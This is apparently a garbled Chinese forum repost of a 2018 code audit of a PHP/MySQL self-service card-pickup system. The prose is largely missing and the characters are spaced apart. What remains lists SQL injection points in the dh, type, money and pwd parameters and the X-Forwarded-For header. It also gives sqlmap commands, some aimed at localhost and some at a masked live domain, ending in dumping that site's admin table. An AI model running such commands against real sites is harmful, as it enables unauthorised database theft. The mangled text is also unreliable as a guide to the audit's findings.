[13015] 2018-08-02_对自助提卡系统的一次代码审计

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2018-08-02_对自助提卡系统的一次代码审计 F K _ T   F r e e B u f   2 0 1 8 - 0 8 - 0 2 p h p + m y s q l 2 4 F o r w a r d e d - F o r  
i n s t a l l l o c k i n d e x . p h p i n s t a l l i n d e x . p h p i n s t a l l / i n d e x . p h p l o c k s t e p 5 h e a d e r e x i t i n d e x . p h p i n d e x . p h p 4 1 3 a p i . p h p
S Q L $ _ P O S T [ d h ] S Q L $ c o n f i g i n d e x a p i . p h p s e a r c h 2 9 4 a p i . p h p s q l m a p S Q L P y t h o n   s q l m a p . p y   - u   h t t p : / / l o c a l h o s t : 8 0 8 1 / i n d e x . p h p   - - b a t c h   - - d b m s = m y s q l   - - d a t a = d h = a
. / p a y / p a y . p h p P y t h o n   s q l m a p . p y   - u   " h t t p : / / l x x x x x . p w / i n d e x . p h p "   - - b a t c h   - - d b m s = " m y s q l "   - - d a t a = " d h = a "
3 8 $ _ G E T [ t y p e ] d e l e t e 4 0 - 4 9 4 1 i p s q l i p
i p H T T P _ X _ F O R W A R D E D _ F O R H T T P _ C L I E N T _ I P 4 1 S Q L S Q L 5 1 - 5 4 _ G E T [ m o n e y ] _ G E T [ p w d ] g e t 5 8 - 6 5 t y p e z f b 退 T i p : T y p e   e r r o r ! g e t 6 7 i p S Q L 6 7 S Q L b u r p i p . / p a y / i n d e x . p h p p a y . p h p i n d e x . p h p 访 h t t p : / / l o c a l h o s t : 8 0 8 1 / p a y / i n d e x . p h p ? t y p e = z f b & m o n e y = 1 & t i t l e = a d s s a d & p w d = 1 2 3 t y p e = a & m o n e y = 1 & t i t l e = a d s s a d & p w d = 1 2 3 t y p e = z f b & m o n e y = 1 & t i t l e = a d s s a d & p w d = 1 2 3
S Q L
S Q L m a p X - F o r w a r d e d - F o r w a f w a f h a n d e r P y t h o n   s q l m a p . p y   - r   t e s t . t x t   - - b a t c h   - - d b m s = " m y s q l "
访 h t t p : / / l x x x x . p w / p a y / i n d e x . p h p ? t y p e = z f b & m o n e y = 1 & t i t l e = a d s s a d & p w d = 1 2 3   s p i d   访   -   - R L h t t p : / / l l x x x x x . p w / p a y / i n d e x . p h p ? t y p e = z f b & m o n e y = 1 & t i t l e = a d s s a d & p w d = 1 2 3 & s p i d = 1
P y t h o n   s q l m a p . p y   - r   t e s t . t x t   - - b a t c h   - - d b m s = " m y s q l " P y t h o n   s q l m a p . p y   - r   t e s t . t x t   - - b a t c h   - D   y u l i n x s c o m   - - t a b l e s P y t h o n   s q l m a p . p y   - r   t e s t . t x t   - - b a t c h   - D   y u l i n x s c o m   - T   a d m i n   - - d u m p
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则